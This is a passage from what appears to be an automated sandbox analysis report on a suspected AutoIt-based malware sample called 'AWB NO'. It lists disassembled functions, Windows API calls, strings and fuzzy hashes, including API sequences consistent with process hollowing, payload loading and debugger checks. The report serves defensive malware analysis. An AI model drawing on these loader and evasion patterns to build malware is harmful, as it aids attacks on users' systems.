                                                              control_flow_graph 1365 10325f0-103269e call 1030000 1368 10326a5-10326cb call 1033500 CreateFileW 1365->1368 1371 10326d2-10326e2 1368->1371 1372 10326cd 1368->1372 1380 10326e4 1371->1380 1381 10326e9-1032703 VirtualAlloc 1371->1381 1373 103281d-1032821 1372->1373 1374 1032863-1032866 1373->1374 1375 1032823-1032827 1373->1375 1377 1032869-1032870 1374->1377 1378 1032833-1032837 1375->1378 1379 1032829-103282c 1375->1379 1382 1032872-103287d 1377->1382 1383 10328c5-10328da 1377->1383 1384 1032847-103284b 1378->1384 1385 1032839-1032843 1378->1385 1379->1378 1380->1373 1386 1032705 1381->1386 1387 103270a-1032721 ReadFile 1381->1387 1390 1032881-103288d 1382->1390 1391 103287f 1382->1391 1392 10328ea-10328f2 1383->1392 1393 10328dc-10328e7 VirtualFree 1383->1393 1394 103285b 1384->1394 1395 103284d-1032857 1384->1395 1385->1384 1386->1373 1388 1032723 1387->1388 1389 1032728-1032768 VirtualAlloc 1387->1389 1388->1373 1396 103276a 1389->1396 1397 103276f-103278a call 1033750 1389->1397 1398 10328a1-10328ad 1390->1398 1399 103288f-103289f 1390->1399 1391->1383 1393->1392 1394->1374 1395->1394 1396->1373 1405 1032795-103279f 1397->1405 1402 10328ba-10328c0 1398->1402 1403 10328af-10328b8 1398->1403 1401 10328c3 1399->1401 1401->1377 1402->1401 1403->1401 1406 10327d2-10327e6 call 1033560 1405->1406 1407 10327a1-10327d0 call 1033750 1405->1407 1413 10327ea-10327ee 1406->1413 1414 10327e8 1406->1414 1407->1405 1415 10327f0-10327f4 FindCloseChangeNotification 1413->1415 1416 10327fa-10327fe 1413->1416 1414->1373 1415->1416 1417 1032800-103280b VirtualFree 1416->1417 1418 103280e-1032817 1416->1418 1417->1418 1418->1368 1418->1373
                                                              APIs
                                                              • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 010326C1
                                                              • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 010328E7
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18136010399.0000000001030000.00000040.00001000.00020000.00000000.sdmp, Offset: 01030000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_1030000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: CreateFileFreeVirtual
                                                              • String ID:
                                                              • API String ID: 204039940-0
                                                              • Opcode ID: d349c2c11462b54f33c86561be68849ac3e84e681e3d8bb3fdc8e10bc75df865
                                                              • Instruction ID: cae535ecda4fe703e89b6e68e805a9b8e23dfc06f30e68f1d274ef915b3f580e
                                                              • Opcode Fuzzy Hash: d349c2c11462b54f33c86561be68849ac3e84e681e3d8bb3fdc8e10bc75df865
                                                              • Instruction Fuzzy Hash: CDA12C74E01209EBDB14CFA4C894BEEBBB9FF88704F208599E541BB281D7759A41CF54
                                                              Function 004039E7 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1486 4039e7-403a57 CreateWindowExW * 2 ShowWindow * 2
                                                              APIs
                                                              • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00403A15
                                                              • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00403A36
                                                              • ShowWindow.USER32(00000000,?,?), ref: 00403A4A
                                                              • ShowWindow.USER32(00000000,?,?), ref: 00403A53
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: Window$CreateShow
                                                              • String ID: AutoIt v3$edit
                                                              • API String ID: 1584632944-3779509399
                                                              • Opcode ID: c5a73eedef5a2465e8ab68d3bd5040811d5becc50fb1d01bf63cd94d759b155d
                                                              • Instruction ID: 2cecf371cb078c9d5b9832381e7f464e31ed9d63f24175115e8a4ea464a317ab
                                                              • Opcode Fuzzy Hash: c5a73eedef5a2465e8ab68d3bd5040811d5becc50fb1d01bf63cd94d759b155d
                                                              • Instruction Fuzzy Hash: B3F03A706002907EEA702723AC48E2B2E7DD7C6F50B02807EB900A2171C2B90841CAB8
                                                              Function 010323B0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 146fileCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1605 10323b0-10324e4 call 1030000 call 10322a0 CreateFileW 1612 10324e6 1605->1612 1613 10324eb-10324fb 1605->1613 1614 103259b-10325a0 1612->1614 1616 1032502-103251c VirtualAlloc 1613->1616 1617 10324fd 1613->1617 1618 1032520-1032537 ReadFile 1616->1618 1619 103251e 1616->1619 1617->1614 1620 103253b-1032575 call 10322e0 call 10312a0 1618->1620 1621 1032539 1618->1621 1619->1614 1626 1032591-1032599 ExitProcess 1620->1626 1627 1032577-103258c call 1032330 1620->1627 1621->1614 1626->1614 1627->1626
                                                              APIs
                                                                • Part of subcall function 010322A0: Sleep.KERNELBASE(000001F4), ref: 010322B1
                                                              • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 010324DA
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18136010399.0000000001030000.00000040.00001000.00020000.00000000.sdmp, Offset: 01030000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_1030000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: CreateFileSleep
                                                              • String ID: VBM05RCB11LBQNL3
                                                              • API String ID: 2694422964-989228358
                                                              • Opcode ID: d48b533791ec94670cc4f351761e3c601766ea1eeb57220fd6f8e36b05e1e94f
                                                              • Instruction ID: e491337a7491a98414f3521753fed92aaad82606f39f279e593870fba069d014
                                                              • Opcode Fuzzy Hash: d48b533791ec94670cc4f351761e3c601766ea1eeb57220fd6f8e36b05e1e94f
                                                              • Instruction Fuzzy Hash: 4F51B330D04249EBEF11DBE4C854BEEBB79AF58300F004599E649BB2C1D7B90B45CBA5
                                                              Function 00437F4D Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 46libraryfileloaderCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1629 437f4d-437f5a call 42a099 1632 437fb3-437fcb CreateFileW 1629->1632 1633 437f5c-437f77 GetModuleHandleW GetProcAddress 1629->1633 1636 437fd1-437fd4 1632->1636 1634 437f79-437f7c 1633->1634 1635 437f7e-437fb1 1633->1635 1634->1636 1635->1636
                                                              APIs
                                                              • GetModuleHandleW.KERNEL32(kernel32.dll,CreateFile2,00000001,?,?,?,00000000,00000109), ref: 00437F66
                                                              • GetProcAddress.KERNEL32(00000000), ref: 00437F6D
                                                              • CreateFileW.KERNELBASE(00000000,?,?,?,00000001,?,00000000,00000001,?,?,?,00000000,00000109), ref: 00437FCB
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: AddressCreateFileHandleModuleProc
                                                              • String ID: CreateFile2$kernel32.dll
                                                              • API String ID: 2580138172-1988006178
                                                              • Opcode ID: ea09d6d378bc21a9666361e880e32e6959fe0576e4c5e61dc7dab1b09cbee97f
                                                              • Instruction ID: d70ff7270049f28d667c02a28a2a1f6434ae09d23a6d4bdad22aee8de2d87f83
                                                              • Opcode Fuzzy Hash: ea09d6d378bc21a9666361e880e32e6959fe0576e4c5e61dc7dab1b09cbee97f
                                                              • Instruction Fuzzy Hash: 4111F3B190020EEFDF119FA4CC05AAE7BB5BF08315F104529FD14A22A0D779CA219B95
                                                              Function 004693DF Relevance: 7.8, APIs: 5, Instructions: 322fileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 004696DC
                                                              • DeleteFileW.KERNEL32(?,?), ref: 00469785
                                                              • CopyFileW.KERNELBASE(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 0046979B
                                                              • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 004697AC
                                                              • DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 004697BE
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: File$Delete$Copy
                                                              • String ID:
                                                              • API String ID: 3226157194-0
                                                              • Opcode ID: 31be63cc4947962446f5ad43d4c308a00826305a42ca0f3975fe443c2ac00bb2
                                                              • Instruction ID: 191076dc936f01cc8c9e86c8f693150e0a9661d95cfde3c8510a733473321b1c
                                                              • Opcode Fuzzy Hash: 31be63cc4947962446f5ad43d4c308a00826305a42ca0f3975fe443c2ac00bb2
                                                              • Instruction Fuzzy Hash: 01C12CB1A00229AACF11DFA5CC85ADFB7BDEF44304F0040ABF609E6151EB749E458F69
                                                              Function 004035B0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 59registryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,004035A1,SwapMouseButtons,00000004,?), ref: 004035D4
                                                              • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,004035A1,SwapMouseButtons,00000004,?,?,?,?,00402754), ref: 004035F5
                                                              • RegCloseKey.KERNELBASE(00000000,?,?,004035A1,SwapMouseButtons,00000004,?,?,?,?,00402754), ref: 00403617
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: CloseOpenQueryValue
                                                              • String ID: Control Panel\Mouse
                                                              • API String ID: 3677997916-824357125
                                                              • Opcode ID: fddb709fe4a1b7e3bb6eda9662e0779279b58f522ad42de317fca39f37a0c6b5
                                                              • Instruction ID: b1ff216ba3ee978410a1c1c06e663b0c2c98cd46aaa17f39490786bf8a1b1252
                                                              • Opcode Fuzzy Hash: fddb709fe4a1b7e3bb6eda9662e0779279b58f522ad42de317fca39f37a0c6b5
                                                              • Instruction Fuzzy Hash: 84114871510208BFDB20CF64DC409AFBBBCEF45741F10486AE805E7250D6729E449768
                                                              Function 010312A0 Relevance: 6.7, APIs: 4, Instructions: 720processthreadCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • CreateProcessW.KERNELBASE(?,00000000), ref: 01031A5B
                                                              • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 01031AF1
                                                              • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 01031B13
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18136010399.0000000001030000.00000040.00001000.00020000.00000000.sdmp, Offset: 01030000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_1030000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                              • String ID:
                                                              • API String ID: 2438371351-0
                                                              • Opcode ID: 91de96a0508c6d9b88b93d6c14255c09b3dee72855056c89e06ebe7f8a996ab2
                                                              • Instruction ID: 019d9ae4400d4bb2484ce0c5d56c3fe4605952981b84884eb5efbaa658103bb1
                                                              • Opcode Fuzzy Hash: 91de96a0508c6d9b88b93d6c14255c09b3dee72855056c89e06ebe7f8a996ab2
                                                              • Instruction Fuzzy Hash: 18621C30A14258DBEB24DFA4C850BDEB376EF98300F1091A9D14DEB390E7769E81CB59
                                                              Function 0040410D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 88windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 004041F1
                                                              • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 0043D5EC
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: IconLoadNotifyShell_String
                                                              • String ID: Line:
                                                              • API String ID: 3363329723-1585850449
                                                              • Opcode ID: 61ae0b375c79386d8c594e1042ccf3d415c40780aa085bb785342811fbdb3ed4
                                                              • Instruction ID: 58a74a7614972f0f445e6137c0dd90b430b5bf5ec00f8e3566b7ff54c1cdf52a
                                                              • Opcode Fuzzy Hash: 61ae0b375c79386d8c594e1042ccf3d415c40780aa085bb785342811fbdb3ed4
                                                              • Instruction Fuzzy Hash: 8B31C171408304AAD761EB60DC45FDB73E8AF44304F10497FB184A21D1EB78A649C79F
                                                              Function 00469B6D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetTempPathW.KERNEL32(00000104,?), ref: 00469B82
                                                              • GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 00469B99
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: Temp$FileNamePath
                                                              • String ID: aut
                                                              • API String ID: 3285503233-3010740371
                                                              • Opcode ID: ef7b029a5636c4efbf44f16e0290ae816bffbefd076ffddc08468feff711a527
                                                              • Instruction ID: 013d5e7a62e72ac985b73f0284bae01e590d9c4b17d6e127dcf3942213dc9704
                                                              • Opcode Fuzzy Hash: ef7b029a5636c4efbf44f16e0290ae816bffbefd076ffddc08468feff711a527
                                                              • Instruction Fuzzy Hash: 73D05E7954030DABDB509B90DC4EFDA772CE704700F004AF1BE54D10A1DEB665A88BA9
                                                              Function 0047CDF1 Relevance: 4.9, APIs: 3, Instructions: 392COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: faa86d935290405cdc7867e1bc7d6cefdf15dd8e6c647087128b0d58640b7550
                                                              • Instruction ID: 2bf0d73c59a36b0507851d1ded096999a1694deed3c02073a268a51cece1c06b
                                                              • Opcode Fuzzy Hash: faa86d935290405cdc7867e1bc7d6cefdf15dd8e6c647087128b0d58640b7550
                                                              • Instruction Fuzzy Hash: 06F15A70A083419FC714DF29C48096ABBE5FF88318F14896EF8999B352D735E946CF86
                                                              Function 00469B2C Relevance: 4.5, APIs: 3, Instructions: 24filetimeCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,004697D2,?,?,?,?,?,00000004), ref: 00469B45
                                                              • SetFileTime.KERNELBASE(00000000,?,00000000,?,?,004697D2,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 00469B5B
                                                              • CloseHandle.KERNEL32(00000000,?,004697D2,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00469B62
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: File$CloseCreateHandleTime
                                                              • String ID:
                                                              • API String ID: 3397143404-0
                                                              • Opcode ID: bd87c49bddbed0dd2230edd6d70eff61a4bb717c0cd42ce1b208173b53aacf55
                                                              • Instruction ID: 635bf028dc577bd3cf26822a797db4ae489a445eb4ef83d2564a7748cecfdbca
                                                              • Opcode Fuzzy Hash: bd87c49bddbed0dd2230edd6d70eff61a4bb717c0cd42ce1b208173b53aacf55
                                                              • Instruction Fuzzy Hash: 91E08632680214B7D7212B54EC0DFCE7B18EB05B61F104534FF14A90E087B12925979C
                                                              Function 004073E5 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 65COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetOpenFileNameW.COMDLG32(?), ref: 0043EEAC
                                                                • Part of subcall function 004048AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,004048A1,?,?,004037C0,?), ref: 004048CE
                                                                • Part of subcall function 004209D5: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 004209F4
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: Name$Path$FileFullLongOpen
                                                              • String ID: X
                                                              • API String ID: 779396738-3081909835
                                                              • Opcode ID: 1395729b3b8d09a4c68be62c9cd7dc45bd9a059d505c17e7ff7ed98a051a2262
                                                              • Instruction ID: 5559bcc2e5b0ce129e075af18a443fb14fc0140c0908acbd47f5bc3bdc75694c
                                                              • Opcode Fuzzy Hash: 1395729b3b8d09a4c68be62c9cd7dc45bd9a059d505c17e7ff7ed98a051a2262
                                                              • Instruction Fuzzy Hash: CF21F671A142589BCB01DF95C845BEE7BF89F49314F00802BE508F7281DBBC598A8FA9
                                                              Function 004043DB Relevance: 3.1, APIs: 2, Instructions: 77windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • Shell_NotifyIconW.SHELL32(00000000,?), ref: 004044A6
                                                              • Shell_NotifyIconW.SHELL32(00000001,?), ref: 004044C3
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: IconNotifyShell_
                                                              • String ID:
                                                              • API String ID: 1144537725-0
                                                              • Opcode ID: 17bf2383e5d0fcb262b91dc9a653c994bcfe1a0960b24ae6562e0ac53503ec64
                                                              • Instruction ID: 9a0e1fda7f7f65855728193d4af9c2fff216fb8ced286e06550385d3abef0fd3
                                                              • Opcode Fuzzy Hash: 17bf2383e5d0fcb262b91dc9a653c994bcfe1a0960b24ae6562e0ac53503ec64
                                                              • Instruction Fuzzy Hash: E63184B15043119FD760DF64D884B9BBBF4FB88308F00093FE69A93291D7796944CB5A
                                                              Function 00430D2D Relevance: 3.1, APIs: 2, Instructions: 60COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • FindCloseChangeNotification.KERNELBASE(00000000,0048FB24,00000000,?,00438469,0048FB24,?,?,?,?,?,?,?,?,00000000,00000109), ref: 00430D7D
                                                              • GetLastError.KERNEL32(?,00438469,0048FB24,?,?,?,?,?,?,?,?,00000000,00000109), ref: 00430D87
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: ChangeCloseErrorFindLastNotification
                                                              • String ID:
                                                              • API String ID: 1687624791-0
                                                              • Opcode ID: 300a3ef4f9bb55e265003ef8e82089e94d85e90b642811f1355a47f7182aa688
                                                              • Instruction ID: b30233e54d73532c4e93ad7821e103f093caaac2fd36eb7f0b866006e3b4b516
                                                              • Opcode Fuzzy Hash: 300a3ef4f9bb55e265003ef8e82089e94d85e90b642811f1355a47f7182aa688
                                                              • Instruction Fuzzy Hash: F5014932B0513016C62016F9B9A9B7F27D49B85778F19036FF8148B2D2DABCE841419E
                                                              Function 0040492E Relevance: 3.1, APIs: 2, Instructions: 59COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • IsThemeActive.UXTHEME ref: 00404992
                                                                • Part of subcall function 004235AC: DecodePointer.KERNEL32(00000001,?,004049A7,004581BC), ref: 004235BE
                                                                • Part of subcall function 004235AC: EncodePointer.KERNEL32(?,?,004049A7,004581BC), ref: 004235C9
                                                                • Part of subcall function 00404A5B: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00404A73
                                                                • Part of subcall function 00404A5B: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00404A88
                                                                • Part of subcall function 00403B4C: GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00403B7A
                                                                • Part of subcall function 00403B4C: IsDebuggerPresent.KERNEL32 ref: 00403B8C
                                                                • Part of subcall function 00403B4C: GetFullPathNameW.KERNEL32(00007FFF,?,?,004C62F8,004C62E0,?,?), ref: 00403BFD
                                                                • Part of subcall function 00403B4C: SetCurrentDirectoryW.KERNEL32(?), ref: 00403C81
                                                              • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 004049D2
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: InfoParametersSystem$CurrentDirectoryPointer$ActiveDebuggerDecodeEncodeFullNamePathPresentTheme
                                                              • String ID:
                                                              • API String ID: 1658450864-0
                                                              • Opcode ID: f0fdbb26218a1bb658e004d1011d9ada979b51ee7de53ddc263ff604cc63f85f
                                                              • Instruction ID: 4f3c985aaa7260ea6862a91c50e24ca429db6960d63ed6b712eae347e098ba5b
